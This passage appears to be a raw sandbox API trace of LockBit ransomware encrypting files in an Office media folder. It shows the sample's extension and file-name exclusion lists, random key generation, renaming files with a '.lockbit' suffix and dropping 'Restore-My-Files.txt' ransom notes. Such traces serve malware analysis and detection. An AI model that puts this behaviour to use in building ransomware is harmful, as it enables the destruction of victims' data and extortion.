returned -1 [0196.752] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.752] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.752] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199549.WMF") returned 1 [0196.752] lstrcmpiW (lpString1="ntldr", lpString2="J0199549.WMF") returned 1 [0196.753] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199549.WMF") returned 1 [0196.753] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199549.WMF") returned -1 [0196.753] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199549.WMF") returned -1 [0196.753] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199549.WMF") returned 1 [0196.753] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199549.WMF") returned -1 [0196.753] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.753] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199549.WMF") returned=".WMF" [0196.753] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.753] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.753] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.754] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.754] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199549.WMF.lockbit") returned 70 [0196.754] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199549.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199549.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.755] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.756] malloc (_Size=0x40068) returned 0x3df0008 [0196.756] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3934) returned 1 [0196.756] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.756] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.756] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.757] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.762] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199549.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199549.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.762] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.762] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.762] free (_Block=0x1fa2ed8) [0196.762] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199549.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.762] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.762] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.762] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b8b4b00, ftCreationTime.dwHighDateTime=0x1be3e9a, ftLastAccessTime.dwLowDateTime=0xbd4c6ce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8b8b4b00, ftLastWriteTime.dwHighDateTime=0x1be3e9a, nFileSizeHigh=0x0, nFileSizeLow=0x341e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199661.WMF", cAlternateFileName="")) returned 1 [0196.762] lstrcmpiW (lpString1=".", lpString2="J0199661.WMF") returned -1 [0196.762] lstrcmpiW (lpString1="..", lpString2="J0199661.WMF") returned -1 [0196.762] PathFindExtensionW (pszPath="J0199661.WMF") returned=".WMF" [0196.762] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.763] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.763] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.764] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199661.WMF") returned 1 [0196.764] lstrcmpiW (lpString1="ntldr", lpString2="J0199661.WMF") returned 1 [0196.764] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199661.WMF") returned 1 [0196.764] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199661.WMF") returned -1 [0196.764] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199661.WMF") returned -1 [0196.764] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199661.WMF") returned 1 [0196.764] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199661.WMF") returned -1 [0196.764] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.764] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199661.WMF") returned=".WMF" [0196.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.765] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.765] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.766] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.766] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.766] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199661.WMF.lockbit") returned 70 [0196.766] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199661.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199661.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.768] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.768] malloc (_Size=0x40068) returned 0x3df0008 [0196.768] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13342) returned 1 [0196.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.769] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199661.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199661.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.797] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.797] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.812] free (_Block=0x1fa2ed8) [0196.813] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199661.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.813] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.813] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.813] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b0eb00, ftCreationTime.dwHighDateTime=0x1be3e9a, ftLastAccessTime.dwLowDateTime=0xbd4c6ce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb1b0eb00, ftLastWriteTime.dwHighDateTime=0x1be3e9a, nFileSizeHigh=0x0, nFileSizeLow=0x900, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199727.WMF", cAlternateFileName="")) returned 1 [0196.813] lstrcmpiW (lpString1=".", lpString2="J0199727.WMF") returned -1 [0196.813] lstrcmpiW (lpString1="..", lpString2="J0199727.WMF") returned -1 [0196.813] PathFindExtensionW (pszPath="J0199727.WMF") returned=".WMF" [0196.813] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.813] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.814] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.814] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199727.WMF") returned 1 [0196.814] lstrcmpiW (lpString1="ntldr", lpString2="J0199727.WMF") returned 1 [0196.814] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199727.WMF") returned 1 [0196.814] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199727.WMF") returned -1 [0196.814] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199727.WMF") returned -1 [0196.814] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199727.WMF") returned 1 [0196.814] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199727.WMF") returned -1 [0196.815] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.815] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199727.WMF") returned=".WMF" [0196.815] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.815] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.815] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.815] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199727.WMF.lockbit") returned 70 [0196.815] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199727.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199727.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.817] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.817] malloc (_Size=0x40068) returned 0x3df0008 [0196.817] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2304) returned 1 [0196.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.818] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, 